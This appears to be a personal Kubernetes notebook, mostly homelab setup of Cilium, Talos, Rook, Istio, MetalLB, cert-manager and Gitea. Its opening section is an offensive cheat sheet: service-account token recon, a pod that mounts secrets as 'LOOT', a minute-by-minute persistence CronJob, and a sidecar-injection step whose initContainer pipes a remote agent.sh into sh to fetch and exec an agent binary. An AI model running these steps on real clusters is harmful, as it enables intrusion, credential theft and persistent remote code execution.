# KUBERNETES_SERVICE_PORT=443
# KUBERNETES_SERVICE_PORT_HTTPS=443

root@nginx-test-574bc578fc-dbsh7:/# curl --insecure https://10.96.0.1
# {
#   "kind": "Status",
#   "apiVersion": "v1",
#   "metadata": {},
#   "status": "Failure",
#   "message": "forbidden: User \"system:anonymous\" cannot get path \"/\"",
#   "reason": "Forbidden",
#   "details": {},
#   "code": 403
# }

root@nginx-test-574bc578fc-dbsh7:/# curl -H "Authorization: Bearer $(cat /run/secrets/kubernetes.io/serviceaccount/token)" --insecure https://10.96.0.1
# {
#   "kind": "Status",
#   "apiVersion": "v1",
#   "metadata": {},
#   "status": "Failure",
#   "message": "forbidden: User \"system:serviceaccount:default:default\" cannot get path \"/\"",
#   "reason": "Forbidden",
#   "details": {},
#   "code": 403
# }
  • /etc/fstab can give away volume mount locations

  • in a container, all of the pod’s service-account secrets are located under the /run/secrets/kubernetes.io/serviceaccount/ directory

root@nginx-test-574bc578fc-dbsh7:/run/secrets/kubernetes.io/serviceaccount# ls -la
# drwxr-xr-x 2 root root  100 Oct 15 17:14 ..2024_10_15_17_14_13.1702215151
# lrwxrwxrwx 1 root root   32 Oct 15 17:14 ..data -> ..2024_10_15_17_14_13.1702215151
# lrwxrwxrwx 1 root root   13 Oct  7 10:02 ca.crt -> ..data/ca.crt
# lrwxrwxrwx 1 root root   16 Oct  7 10:02 namespace -> ..data/namespace
# lrwxrwxrwx 1 root root   12 Oct  7 10:02 token -> ..data/token
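The token file above is a JWT: its middle dot-separated segment is base64url-encoded JSON revealing the namespace and service-account name without any API calls. A sketch using a fabricated sample token (on a real pod, read the token from /run/secrets/kubernetes.io/serviceaccount/token instead):

```shell
# fabricate a sample token so this sketch is self-contained;
# real usage: token=$(cat /run/secrets/kubernetes.io/serviceaccount/token)
payload=$(printf '%s' '{"sub":"system:serviceaccount:default:default"}' | base64 | tr -d '\n' | tr '+/' '-_')
token="header.${payload}.signature"

# decode the payload: take field 2, undo base64url, base64-decode
# note: real JWTs strip '=' padding; append it if base64 -d complains
printf '%s' "$token" | cut -d. -f2 | tr '_-' '/+' | base64 -d
# -> {"sub":"system:serviceaccount:default:default"}
```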

access a pod’s webservice using curl

kubectl get services --all-namespaces
# NAMESPACE     NAME            TYPE        CLUSTER-IP       EXTERNAL-IP   PORT(S)
# monitoring    grafana         ClusterIP   10.99.24.78      <none>        80/TCP 

kubectl describe service --namespace monitoring grafana
# Name:              grafana
# Namespace:         monitoring
# Labels:            app.kubernetes.io/instance=grafana
# app.kubernetes.io/managed-by=Helm
# app.kubernetes.io/name=grafana
# app.kubernetes.io/version=11.5.2
# helm.sh/chart=grafana-8.10.3
# Annotations:       meta.helm.sh/release-name: grafana
# meta.helm.sh/release-namespace: monitoring
# Selector:          app.kubernetes.io/instance=grafana,app.kubernetes.io/name=grafana
# Type:              ClusterIP
# IP Family Policy:  SingleStack
# IP Families:       IPv4
# IP:                10.99.24.78
# IPs:               10.99.24.78
# Port:              service  80/TCP
# TargetPort:        3000/TCP
# Endpoints:         10.244.1.186:3000
# Session Affinity:  None
# Events:            <none>

curl http://10.99.24.78
# <a href="/login">Found</a>

determine what serviceAccount the Pod is using

kubectl get pods/$POD_NAME -o yaml | yq .spec.serviceAccountName

find your permissions

kubectl auth whoami
# ATTRIBUTE   VALUE
# Username    kubernetes-admin
# Groups      [kubeadm:cluster-admins system:authenticated]

# first figure out if anything apart from RBAC (default is "Node,RBAC") is used:
# it can either be defined by using AuthorizationConfiguration resource 
# or kube-apiserver command-line parameters defined in it's manifest on master-node
kubectl get authorizationconfigurations
cat /etc/kubernetes/manifests/kube-apiserver.yaml


# the following means that kubeadm:cluster-admins is a ClusterRoleBinding that points to cluster-admin ClusterRole 
# OMIT THE "s"
kubectl get clusterrolebindings -A | grep kubeadm:cluster-admin
# kubeadm:cluster-admins          ClusterRole/cluster-admin

# cluster-admin ClusterRole can use ['*'] verbs on ['*'] api-resources, this is boring
# just for the sake of an example (of course it doesn't), 
# let's say that cluster-admins binds to ClusterRole/cilium-operator:

# the following means cilium-operator can CREATE/GET/LIST/WATCH customresourcedefinitions and 
# UPDATE specific resource named ciliumnodes
# which are contained within apiextensions.k8s.io APIVERSION
kubectl describe clusterrole cilium-operator
# Name:         cilium-operator
# Labels:       app.kubernetes.io/managed-by=Helm
# Resources                                          Non-Resource URLs  Resource Names           Verbs
# ---------                                          -----------------  --------------           -----
# customresourcedefinitions.apiextensions.k8s.io     []                 []                       [create get list watch]
# customresourcedefinitions.apiextensions.k8s.io     []                 [ciliumnodes.cilium.io]  [update]

# if the following doesn't return anything, it likely means the resource
# was not created in your environment during package installation
kubectl get customresourcedefinitions | grep ciliumnodes
# ciliumnodes.cilium.io                        2024-10-06T12:55:42Z

# print object definition
kubectl describe customresourcedefinitions ciliumnodes | less

mount discovery

df
cat /etc/fstab
lsblk              # will probably fail


df
# Filesystem                                                1K-blocks    Used        Available Use% Mounted on
# overlay                                                   314560492 8837544        305722948   3% /
# fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com:/ 9007199254739968       0 9007199254739968   0% /efs
# tmpfs                                                      62022172      12         62022160   1% /var/run/secrets/kubernetes.io/serviceaccount
# tmpfs                                                         65536       0            65536   0% /dev/null

dig fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com | grep -A1 "ANSWER SECTION"
# fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com. 23 IN A 192.168.124.98

sidecar discovery

  • all containers in the Pod share the same network namespace
# the following shows a /31 netmask, which means 192.168.28.66 is a neighbor peer
ifconfig
# ns-564e82: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
#     inet 192.168.28.67  netmask 255.255.255.254  broadcast 0.0.0.0

Execution

exec via kubectl

# query if you have the rights to create a "pods/exec" subresource
kubectl auth can-i create pods/exec
# being able to create this subresource effectively means the ability to execute the following operations:

# execute command inside the pod’s first container
kubectl exec $POD_NAME -- $COMMAND

# copy file into the pod
kubectl cp $LOCAL_PATH $POD_NAME:$REMOTE_PATH

  • When Exec-ing into a pod, you will by default exec into the first container listed in the pod manifest. If there are multiple containers in a pod, you can list them with kubectl get pods <pod_name> -o jsonpath='{.spec.containers[*].name}', which outputs the name of each container. Once you have a container’s name, you can target it with the -c flag: kubectl exec -it <pod_name> -c <container_name> -- sh

sidecar container injection

#!/bin/sh
# agent.sh: download the agent binary and replace the shell with it
set -e

BINARY_URL="http://192.168.88.250:9595/agent.elf"
TARGET_PATH="/tmp/agent"

curl -L -f -o "$TARGET_PATH" "$BINARY_URL"
chmod +x "$TARGET_PATH"
exec "$TARGET_PATH"

kubectl patch deploy nginx-demo -n test --type='strategic' --patch '
spec:
  template:
    spec:
      initContainers:
      - name: setup-script
        image: curlimages/curl
        command: ["/bin/sh", "-c"]
        args: ["curl -s http://192.168.88.250:9595/agent.sh | sh"]
'

PrivEsc

arbitrary pod creation abuse

If you’re allowed to create pods:

kubectl auth can-i create pods
# being able to create this resource effectively means the ability to perform the following operations:

# Create *any* pod (if no policy engine (e.g. Kyverno) is present within the cluster)
kubectl apply -f myPod.yaml

Now you can create a pod that mounts any secret (either as a volume or as an environment variable), which opens new opportunities to attack the rest of the cluster.
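For example (a sketch; the secret name some-secret and key token are hypothetical, substitute ones found via kubectl get secrets):

```yaml
# myPod.yaml
apiVersion: v1
kind: Pod
metadata:
  name: snoop
spec:
  containers:
  - name: snoop
    image: busybox:1.28
    command: ["sleep", "3600"]
    env:
    # expose a single secret value as an environment variable
    - name: LOOT
      valueFrom:
        secretKeyRef:
          name: some-secret
          key: token
    volumeMounts:
    # ...or mount the whole secret as files under /mnt/secret
    - name: secret-vol
      mountPath: /mnt/secret
      readOnly: true
  volumes:
  - name: secret-vol
    secret:
      secretName: some-secret
```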

Persistence

cronJob

Execution

apiVersion: batch/v1
kind: CronJob
metadata:
  name: anacronda
spec:
  schedule: "* * * * *" # run every minute
  jobTemplate:
    spec:
      template:
        spec:
          containers:
          - name: anacronda 
            image: busybox:1.28
            imagePullPolicy: IfNotPresent
            command:
            - /bin/sh
            - -c
            - date; echo hello
          restartPolicy: OnFailure

Recon

Basic

import SA token

# you need KUBERNETES_PORT (if running kubectl from inside the container) or the apiserver's external IP, plus ca.crt and the token
kubectl config set-cluster my-cluster \
--server=https://$API_SERVER:$PORT \
--certificate-authority=/path/to/ca.crt \
--embed-certs=true

kubectl config set-credentials sa-user \
--token="$SA_TOKEN"

kubectl config set-context sa-context \
--cluster=my-cluster \
--user=sa-user

kubectl config use-context sa-context

kubectl auth can-i --list

Troubleshooting

add custom CA if there are no init containers that run update-ca-certificates for the pod

kubectl -n gitea patch deployment gitea \
--type='json' \
-p='[
  {
    "op": "add",
    "path": "/spec/template/spec/volumes/-",
    "value": {
      "name": "internal-root-ca",
      "configMap": {
        "name": "internal-root-ca"
      }
    }
  },
  {
    "op": "add",
    "path": "/spec/template/spec/volumes/-",
    "value": {
      "name": "ca-store",
      "emptyDir": {}
    }
  },
  {
    "op": "add",
    "path": "/spec/template/spec/containers/0/volumeMounts/-",
    "value": {
      "name": "ca-store",
      "mountPath": "/etc/ssl/certs/"
    }
  },
  {
    "op": "add",
    "path": "/spec/template/spec/initContainers/-",
    "value": {
      "name": "build-ca",
      "image": "docker.io/fluxcd/flux:1.17.0",
      "imagePullPolicy": "IfNotPresent",
      "command": ["/usr/sbin/update-ca-certificates"],
      "volumeMounts": [
        {
          "mountPath": "/usr/local/share/ca-certificates/",
          "name": "internal-root-ca",
          "readOnly": true
        },
        {
          "mountPath": "/etc/ssl/certs/",
          "name": "ca-store"
        }
      ]
    }
  }
]'

fix minikube volumeMounts permission errors

Add gitea. Set valkey.volumePermissions.enabled=true: this enables an init container that changes the owner/group of the PV mount point to runAsUser:fsGroup on the valkey containers.

helm upgrade --install gitea gitea-charts/gitea \
--namespace gitea --create-namespace \
--set postgresql-ha.enabled=false \
--set postgresql.enabled=true \
--set valkey-cluster.enabled=false \
--set valkey.enabled=true \
--set valkey.volumePermissions.enabled=true \
--set gitea.config.server.ROOT_URL=https://gitea.minikube.lab/

Errors:

kubectl -n gitea logs gitea-68577d9b9-ssmjh -c init-directories
# mkdir: can't create directory '/data/git/': Permission denied

I tried debugging by displaying the directory permissions:

EDITOR=nvim kubectl -n gitea edit deploy gitea
#       initContainers:
#       - command:
#         - /bin/sh
#         - -c
#         - |
#           id
#           ls -la /data
#           /usr/sbin/init_directory_structure.sh
#         image: docker.gitea.com/gitea:1.24.6-rootless
#         name: init-directories
# ...

kubectl -n gitea rollout restart deployment gitea

kubectl -n gitea logs gitea-6f4db975f6-l2txr -c init-directories
# uid=1000(git) gid=1000(git) groups=1000(git)
# total 8
# drwxr-xr-x    2 root     root          4096 Feb 12 07:11 .
# drwxr-xr-x    1 root     root          4096 Feb 28 10:19 ..
# mkdir: can't create directory '/data/git/': Permission denied

That’s expected: by default gitea runs as the git user due to its securityContext

kubectl -n gitea get deploy gitea -o yaml
#         securityContext:
#           runAsUser: 1000

Kubernetes normally changes the ownership of volume mounts according to the pod's securityContext (fsGroup), but this doesn't work on minikube, so we have to change it manually using an initContainer:

initContainers:
- name: fix-volume-permissions
  image: alpine:latest
  command: 
  - sh
  - -c
  - chown -R 1000:1000 /data
  securityContext:
    runAsUser: 0
    runAsGroup: 0
  volumeMounts:
  - mountPath: /data
    name: data

Add authentik:

# authentik-values.yaml

authentik:
  secret_key: "$KEY"
  # This sends anonymous usage-data, stack traces on errors and
  # performance data to sentry.io, and is fully opt-in
  error_reporting:
    enabled: true
  postgresql:
    password: "$PASSWD"

postgresql:
  enabled: true
  auth:
    password: "$PASSWD"
redis:
  enabled: true

helm upgrade --install authentik authentik/authentik \
--namespace authentik --create-namespace \
-f authentik-values.yaml

kubectl -n authentik logs authentik-postgresql-0
# mkdir: cannot create directory ‘/bitnami/postgresql/data’: Permission denied

EDITOR=nvim kubectl -n authentik edit statefulset authentik-postgresql
# initContainers:
# - command:
#   - /bin/sh
#   - -c
#   - |
#     id
#     ls -la /bitnami/postgresql
#     chown -R 1001:1001 /bitnami/postgresql
#   image: alpine:latest
#   imagePullPolicy: Always
#   name: fix-volume-permissions
#   resources: {}
#   securityContext:
#     runAsGroup: 0
#     runAsUser: 0
#   terminationMessagePath: /dev/termination-log
#   terminationMessagePolicy: File
#   volumeMounts:
#   - mountPath: /bitnami/postgresql
#     name: data

Now rollout-restart all deployments and statefulsets.

Test

kubectl -n test get svc
# NAME            TYPE        CLUSTER-IP       EXTERNAL-IP   PORT(S)    AGE
# postgresql      ClusterIP   10.104.111.175   <none>        5432/TCP   41s
# postgresql-hl   ClusterIP   None             <none>        5432/TCP   41s

kubectl -n authentik port-forward svc/authentik-server 9596:80
# Forwarding from 127.0.0.1:9596 -> 9000
# Forwarding from [::1]:9596 -> 9000
# Handling connection for 9596

prevent namespace stuck in terminating

kubectl get namespace $NAMESPACE -o json > ns.json

nvim ns.json
# "finalizers": []

kubectl replace --raw "/api/v1/namespaces/$NAMESPACE/finalize" -f ./ns.json

troubleshoot DiskPressure taint on a node

https://kubernetes.io/blog/2024/01/23/kubernetes-separate-image-filesystem/

The following event means the node couldn't free the ~1.3 GB of disk space it needs to run Pods:

kubectl describe nodes coreos02
# Events:
#   Warning  FreeDiskSpaceFailed      69s                 kubelet          Failed to garbage collect required amount of images. Attempted to free 1339201945 bytes, but only found 0 bytes eligible to free.
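The byte count in that event converts to roughly 1.25 GiB, which matches the missing ~1Gi:

```shell
# convert the kubelet's byte count to MiB for readability
bytes=1339201945
echo "$((bytes / 1024 / 1024)) MiB"   # -> 1277 MiB (~1.25 GiB)
```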

In order to fix this:

  1. attach a larger disk to the libvirt_domain
  2. configure cri-o (or another container runtime) to use a directory on the new disk for containers: https://github.com/cri-o/cri-o/blob/main/docs/crio.conf.5.md

### /etc/crio/crio.conf
# see `man containers-storage.conf`
[crio]
# Default storage driver
storage_driver = "overlay"
# Temporary storage location (default: "/run/containers/storage")
runroot = "/var/run/containers/storage"
# Primary read/write location of container storage (default:  "/var/lib/containers/storage")
root = "/var/lib/containers/storage"

Helm

Basic usage

# add repo
helm repo add $REPO_NAME $REPO
# helm repo add prometheus-community https://prometheus-community.github.io/helm-charts

# list packages in repo
helm search repo $REPO_NAME
# helm search repo fluentd

# install package
helm install $POD_NAME $REPO_NAME/$PACKAGE_NAME
# helm install prometheus prometheus-community/prometheus

CRI

CRI-O

Execution

run command against crio container

# list running containers
crictl ps

# run command on a container
crictl exec -it $CONTAINER_ID /bin/bash

Cilium

Installation

Nodes will be in the NotReady status until a CNI is installed.

# cilium install --namespace kube-system will result in an `unable to apply caps: operation not permitted`
# error: {https://docs.siderolabs.com/talos/v1.11/learn-more/process-capabilities};
# {https://docs.siderolabs.com/kubernetes-guides/cni/deploying-cilium};
# append cni.exclusive=false for integration with istio (see {https://istio.io/latest/docs/ambient/install/platform-prerequisites/#cilium})
cilium install --namespace kube-system \
--set kubeProxyReplacement=false \
--set securityContext.capabilities.ciliumAgent="{CHOWN,KILL,NET_ADMIN,NET_RAW,IPC_LOCK,SYS_ADMIN,SYS_RESOURCE,DAC_OVERRIDE,FOWNER,SETGID,SETUID}" \
--set securityContext.capabilities.cleanCiliumState="{NET_ADMIN,SYS_ADMIN,SYS_RESOURCE}" \
--set cgroup.autoMount.enabled=false \
--set cgroup.hostRoot=/sys/fs/cgroup \
--set cni.exclusive=false

kubectl rollout restart ds cilium -n kube-system

cilium status --wait
# wait until it's OK

inter-node traffic encryption via Wireguard

cilium upgrade --namespace kube-system \
--reuse-values \
--set encryption.enabled=true \
--set encryption.type=wireguard

kubectl rollout restart daemonset/cilium -n kube-system

cilium encryption status
# Encryption: Wireguard (4/4 nodes)

General

kompose (convert docker compose to k8s manifests)

  • you can specify custom options using labels (e.g. if you want a StatefulSet instead of a Deployment)

version: "3.9"

services:
  app:
    image: your-spring-boot-app:latest
    container_name: springboot-app
    ports:
      - "8080:8080"
    environment:
      SPRING_DATASOURCE_URL: jdbc:postgresql://db:5432/mydb
      SPRING_DATASOURCE_USERNAME: postgres
      SPRING_DATASOURCE_PASSWORD: postgres
      SPRING_REDIS_HOST: redis
      SPRING_REDIS_PORT: 6379
    depends_on:
      - db
      - redis

  db:
    image: postgres:15
    labels:
      kompose.service.type: nodeport
      kompose.controller.type: statefulset
    container_name: postgres-db
    environment:
      POSTGRES_DB: mydb
      POSTGRES_USER: postgres
      POSTGRES_PASSWORD: postgres
    ports:
      - "5432:5432"
    volumes:
      - db-data:/var/lib/postgresql/data

  redis:
    image: redis:7
    container_name: redis
    ports:
      - "6379:6379"

volumes:
  db-data:

kompose convert -f compose.yaml

ls -la
# app-deployment.yaml                 db-service.yaml
# app-service.yaml                    redis-deployment.yaml
# compose.yaml                        redis-service.yaml
# db-data-persistentvolumeclaim.yaml  db-deployment.yaml

A PersistentVolumeClaim manifest is generated for each attached volume.

minikube

Basic

# start multinode KVM cluster
minikube start --cpus 2 --memory 8000 --nodes 3 --kvm-network='k8s_lab' --cni=cilium

# delete existing cluster (e.g. to change options)
minikube delete

# add nodes to an existing cluster (minikube node add)

# list logs
minikube logs

Talos

Quickstart

Install talosctl on management machine (e.g. debian)

curl -sL https://talos.dev/install | sh

Create a custom ISO at https://factory.talos.dev/ with all defaults except ticking the “qemu-guest-agent” extension; copy the ISO URL and the “Initial Installation” image string

Download the ISO within Proxmox.

Boot the VM with all default parameters except for CPU (2 cores) and RAM (8 GB). Attach virtual hard drives to the DP (worker) nodes.

export CONTROL_PLANE_IP=192.168.1.189
nvim patch.yaml
# cluster:
#   network:
#     cni:
#       name: none

# paste the "Initial installation" link
talosctl gen config talos-proxmox-cluster https://$CONTROL_PLANE_IP:6443 --output-dir _out --install-image factory.talos.dev/metal-installer/ce4c980550dd2ab1b17bbf2b08801c7eb59418eafe8f279833297925d67c7515:v1.11.2 --config-patch @patch.yaml
talosctl apply-config --insecure --nodes $CONTROL_PLANE_IP --file _out/controlplane.yaml

Repeat the VM creation process for each DP (worker) node

export WORKER_IP=192.168.1.109
talosctl apply-config --insecure --nodes $WORKER_IP --file _out/worker.yaml

Run the following commands:

export TALOSCONFIG="_out/talosconfig"
talosctl config endpoint $CONTROL_PLANE_IP
talosctl config node $CONTROL_PLANE_IP
talosctl bootstrap --nodes $CONTROL_PLANE_IP

# retrieve kubeconfig to current directory
talosctl kubeconfig .

# test the cluster
kubectl --kubeconfig=./kubeconfig get nodes

# create a link to kubeconfig so that we don't have to
# specify the path to it all the time
ln -s ~/proxmox/kubeconfig ~/.kube/config

CSI

Rook

Setup

Install Rook:

git clone --single-branch --branch release-1.18 https://github.com/rook/rook.git
cd rook/deploy/examples
kubectl create -f crds.yaml -f common.yaml -f csi-operator.yaml -f operator.yaml
kubectl create -f cluster.yaml
# list api-resources to ensure cephcluster is present
kubectl api-resources
# cephclusters        ceph        ceph.rook.io/v1          true         CephCluster

kubectl get cephclusters -A
# NAMESPACE   NAME        DATADIRHOSTPATH
# rook-ceph   rook-ceph   /var/lib/rook

# OPTIONALLY
# after the TLDR deployment, edit the number of mons to fit your cluster (3 recommended)
# {https://rook.io/docs/rook/latest/CRDs/Cluster/ceph-cluster-crd/#ceph-config}
kubectl edit -n rook-ceph cephcluster rook-ceph
# spec:
#   mon:
#     count: 2
#   cephConfig:
#     global:
#       osd_pool_default_size: "2"

# label the rook-ceph namespace with pod-security.kubernetes.io/enforce=privileged label
# otherwise pods won't deploy due to violating PodSecurity
kubectl label namespace rook-ceph pod-security.kubernetes.io/enforce=privileged --overwrite

# ensure all rook-ceph resources are ready
watch kubectl -n rook-ceph get pods

# ensure HEALTH_OK
kubectl rook-ceph ceph status

Now you can choose from 3 storage options: https://rook.io/docs/rook/latest/Getting-Started/quickstart/#storage I will go with Block storage:

First copy the manifest from https://rook.io/docs/rook/latest/Storage-Configuration/Block-Storage-RBD/block-storage/#provision-storage and save it to storageclass.yaml file.

# adjust replication size if needed
nvim storageclass.yaml
# spec:
#   failureDomain: host
#   replicated:
#     size: 2

# create StorageClass and CephBlockPool
kubectl create -f storageclass.yaml

Ingress

Service Mesh

Istio

Gitea setup

deploy gitea: https://gitea.com/gitea/helm-gitea#persistence, https://gitea.com/gitea/helm-gitea/src/branch/main/values.yaml

# create a namespace for gitea
kubectl create namespace gitea

# deploy gitea specifying the storageClass: this lets gitea create PersistentVolumeClaims that request PersistentVolumes
# from the rook-ceph-block StorageClass we created earlier
helm install gitea gitea-charts/gitea \
--namespace gitea \
--create-namespace \
--set postgresql-ha.enabled=false \
--set postgresql.enabled=true \
--set persistence.storageClass='rook-ceph-block' \
--set postgresql.primary.persistence.storageClass='rook-ceph-block' \
--set valkey-cluster.persistence.storageClass='rook-ceph-block' \
--set gitea.config.server.ROOT_URL=https://gitea.aperture.ad/

Let’s now configure Istio for ingress: https://istio.io/latest/docs/setup/install/helm/#installation-steps

kubectl create namespace istio-system
kubectl label --overwrite namespace istio-system \
pod-security.kubernetes.io/enforce=privileged \
pod-security.kubernetes.io/enforce-version=latest

istioctl install --set components.cni.enabled=true -y

Now expose gitea: https://istio.io/latest/docs/setup/additional-setup/pod-security-admission/#install-istio-with-psa

# istio sidecar mode routes traffic only for workloads with sidecars injected
# Enable sidecar injection for pods in a namespace:
kubectl label namespace gitea istio-injection=enabled

# verify injection is enabled for the namespace
kubectl get namespace -L istio-injection

kubectl -n gitea get pods
kubectl -n gitea delete pod gitea-6fb84975c6-d4tzv

nvim gitea-ingress.yaml
# apiVersion: networking.istio.io/v1beta1
# kind: Gateway
# metadata:
#   name: gitea-gateway
#   namespace: gitea
# spec:
#   selector:
#     istio: ingressgateway
#   servers:
#     - port:
#         number: 80
#         name: http
#         protocol: HTTP
#       hosts:
#         - "gitea.aperture.ad"
# ---
# apiVersion: networking.istio.io/v1beta1
# kind: VirtualService
# metadata:
#   name: gitea
#   namespace: gitea
# spec:
#   hosts:
#     - "gitea.aperture.ad"
#   gateways:
#     - gitea-gateway
#   http:
#     - match:
#         - uri:
#             prefix: /
#       route:
#         - destination:
#             host: gitea-http.gitea.svc.cluster.local
#             port:
#               number: 3000


kubectl apply -f gitea-ingress.yaml

# ensure that istio-proxy is a part of Init Containers
kubectl -n gitea describe pod gitea-6fb84975c6-lxb6b

kubectl -n gitea get vs

Currently the ingress service type is LoadBalancer; its EXTERNAL-IP stays <pending> until a load-balancer implementation (e.g. MetalLB, set up below) assigns one

kubectl -n istio-system get svc istio-ingressgateway
# NAME                   TYPE           CLUSTER-IP       EXTERNAL-IP   PORT(S)                                      AGE
# istio-ingressgateway   LoadBalancer   10.108.215.121   <pending>     15021:30679/TCP,80:30864/TCP,443:30769/TCP   11h

cat /etc/hosts
# 192.168.88.243 gitea.aperture.ad

Kiali

Setup

cd istio/
kubectl apply -f samples/addons
kubectl rollout status deployment/kiali -n istio-system
istioctl dashboard kiali

Load Balancers

MetalLB

Setup

Addresses from the pool get assigned to LoadBalancer services.

helm repo add metallb https://metallb.github.io/metallb

nvim metallb-config.yaml
# apiVersion: metallb.io/v1beta1
# kind: IPAddressPool
# metadata:
#   name: default-pool
#   namespace: metallb-system
# spec:
#   addresses:
#     - 192.168.88.242-192.168.88.244
# ---
# apiVersion: metallb.io/v1beta1
# kind: L2Advertisement
# metadata:
#   name: default
#   namespace: metallb-system

kubectl apply -f metallb-config.yaml

# we can now access the service externally
curl http://gitea.aperture.ad

# label metallb-system ns with privileged to allow metallb-speaker pods
kubectl label --overwrite namespace metallb-system \
pod-security.kubernetes.io/enforce=privileged \
pod-security.kubernetes.io/enforce-version=latest
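If a service should keep a specific address from the pool, MetalLB supports requesting one via the metallb.universe.tf/loadBalancerIPs annotation (a sketch; the service name and selector are hypothetical):

```yaml
# hypothetical service pinned to one address from default-pool
apiVersion: v1
kind: Service
metadata:
  name: my-svc
  annotations:
    metallb.universe.tf/loadBalancerIPs: 192.168.88.243
spec:
  type: LoadBalancer
  selector:
    app: my-app
  ports:
  - port: 80
    targetPort: 8080
```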

Cert Managers

cert-manager

Setting up certificates for Gitea

helm install cert-manager oci://quay.io/jetstack/charts/cert-manager \
--namespace cert-manager \
--create-namespace \
--set crds.enabled=true

# define issuers and certificate for gitea
nvim cert-manager-gitea.yaml
# apiVersion: cert-manager.io/v1
# kind: ClusterIssuer
# metadata:
#   name: internal-ca
# spec:
#   selfSigned: {}
# ---
# apiVersion: cert-manager.io/v1
# kind: Certificate
# metadata:
#   name: internal-ca
#   namespace: cert-manager
# spec:
#   secretName: internal-ca-key-pair
#   commonName: "Aperture Root CA"
#   isCA: true
#   issuerRef:
#     name: internal-ca
#     kind: ClusterIssuer
# ---
# apiVersion: cert-manager.io/v1
# kind: ClusterIssuer
# metadata:
#   name: internal-ca-issuer
# spec:
#   ca:
#     secretName: internal-ca-key-pair
# ---
# apiVersion: cert-manager.io/v1
# kind: Certificate
# metadata:
#   name: gitea-cert
#   namespace: istio-system
# spec:
#   secretName: gitea-tls
#   issuerRef:
#     name: internal-ca-issuer
#     kind: ClusterIssuer
#   commonName: gitea.aperture.ad
#   dnsNames:
#     - gitea.aperture.ad

# update gitea gateway to use it
kubectl -n gitea edit gw gitea-gateway
# apiVersion: networking.istio.io/v1beta1
# kind: Gateway
# metadata:
#   name: gitea-gateway
#   namespace: gitea
# spec:
#   selector:
#     istio: ingressgateway
#   servers:
#     - port:
#         number: 80
#         name: http
#         protocol: HTTP
#       hosts:
#         - "gitea.aperture.ad"
#       tls:
#         httpsRedirect: true
#     - port:
#         number: 443
#         name: https
#         protocol: HTTPS
#       hosts:
#         - "gitea.aperture.ad"
#       tls:
#         mode: SIMPLE
#         credentialName: gitea-tls

kubectl -n cert-manager get secret internal-ca-key-pair -o jsonpath='{.data.ca\.crt}' | base64 -d > k8s-aperture-root-ca.crt
sudo cp k8s-aperture-root-ca.crt /usr/local/share/ca-certificates
sudo update-ca-certificates
# additionally, import this CA into your browser

make cert-manager use custom self-signed CA

openssl genrsa -out rootCA.key 4096

openssl req -x509 -new -nodes \
-key rootCA.key \
-sha256 \
-days 3650 \
-out rootCA.crt \
-subj "/CN=Aperture Internal CA/O=Aperture Inc"

kubectl create secret generic internal-ca-key-pair -n cert-manager \
--from-file=tls.crt=rootCA.crt \
--from-file=tls.key=rootCA.key \
--from-file=ca.crt=rootCA.crt \
--dry-run=client -o yaml | kubectl apply -f -

# renew all
kubectl get certificate --all-namespaces -o jsonpath='{range .items[?(@.spec.issuerRef.name=="internal-ca-issuer")]}{.metadata.namespace}{" "}{.metadata.name}{"\n"}{end}' | \
while read ns name; do
  echo "Renewing $ns/$name..."
  cmctl renew "$name" -n "$ns"
done

# restart
kubectl rollout restart deployment istio-ingressgateway -n istio-system

# the existing ClusterIssuer keeps referencing the replaced secret:
kind: ClusterIssuer
# ...
spec:
  ca:
    secretName: internal-ca-key-pair
# ...

trust-manager

Usage example

Before configuring OIDC on the application side, we need to ensure that the application trusts authentik's certificate issuer. To achieve that I will use trust-manager

helm upgrade trust-manager jetstack/trust-manager \
--install \
--namespace cert-manager

nvim ca-bundle.yaml
# apiVersion: trust.cert-manager.io/v1alpha1
# kind: Bundle
# metadata:
#   name: internal-root-ca
# spec:
#   sources:
#     - secret:
#         name: internal-ca-key-pair
#         key: tls.crt
#   target:
#     configMap:
#       key: ca.crt
#     namespaceSelector:
#       matchLabels:
#         use-internal-ca: "true"

kubectl apply -f ca-bundle.yaml

kubectl label namespace gitea use-internal-ca=true
kubectl label namespace authentik use-internal-ca=true

kubectl -n gitea describe configmap internal-root-ca

# mount the configmap as a volume
kubectl -n gitea edit deployment gitea
# spec:
#   template:
#     spec:
#       volumes:
#         - name: internal-ca
#           configMap:
#             name: internal-root-ca
#       containers:
#         - env:
#           name: gitea
#           volumeMounts:
#             - name: internal-ca
#               mountPath: /etc/ssl/certs/internal-ca.crt
#               subPath: ca.crt
#               readOnly: true

kubectl -n authentik patch deployment authentik-server --type='json' \
-p='[
  {
    "op": "add",
    "path": "/spec/template/spec/volumes/-",
    "value": {
      "name": "internal-ca",
      "configMap": {
        "name": "internal-root-ca"
      }
    }
  },
  {
    "op": "add",
    "path": "/spec/template/spec/containers/0/volumeMounts/-",
    "value": {
      "name": "internal-ca",
      "mountPath": "/etc/ssl/certs/internal-ca.crt",
      "subPath": "ca.crt",
      "readOnly": true
    }
  }
]'

GitOps

Gitea

Persistence

create an admin user

kubectl -n gitea exec -it gitea-6456cd87bf-mdr8r -- /bin/bash
gitea admin user create --username admin --admin --email admin@aperture.ad --random-password --must-change-password=false

Setup

K8s + Gitea Actions + Harbor

helm repo add gitea-charts https://dl.gitea.com/charts/
helm repo update

helm show values gitea-charts/actions > gitea-runner-values.yaml
# enabled: true
#     # See full example here: https://gitea.com/gitea/act_runner/src/branch/main/internal/pkg/config/config.example.yaml
#     config: |
#       log:
#         level: debug
#       cache:
#         enabled: false
#       container:
#         require_docker: true
#         docker_timeout: 300s
#         network: "host"
#         valid_volumes:
#           - '**'
#         options: "-e 'DOCKER_TLS_VERIFY=1' -e 'DOCKER_CERT_PATH=/certs/server' -e 'DOCKER_HOST=tcp://127.0.0.1:2376' --volume /etc/ssl/certs:/etc/ssl/certs:ro --volume /etc/ssl/certs/ca-certificates.crt:/etc/ssl/certs/ca-certificates.crt:ro --volume /certs/client:/certs/server:ro"

#
# ## Specify an existing token secret
# ##
# existingSecret: "gitea-runner-token"
# existingSecretKey: "token"
#
# ## Specify the root URL of the Gitea instance
# giteaRootURL: "https://gitea.aperture.ad"
#
# ## @section Global
# global:
#   imageRegistry: "harbor.aperture.ad/gitea"
#   storageClass: "rook-ceph-block"

helm upgrade --install --namespace gitea gitea-actions gitea-charts/actions -f gitea-runner-values.yaml

# or you can retrieve it via the GUI (Site administration > Actions > Runners)
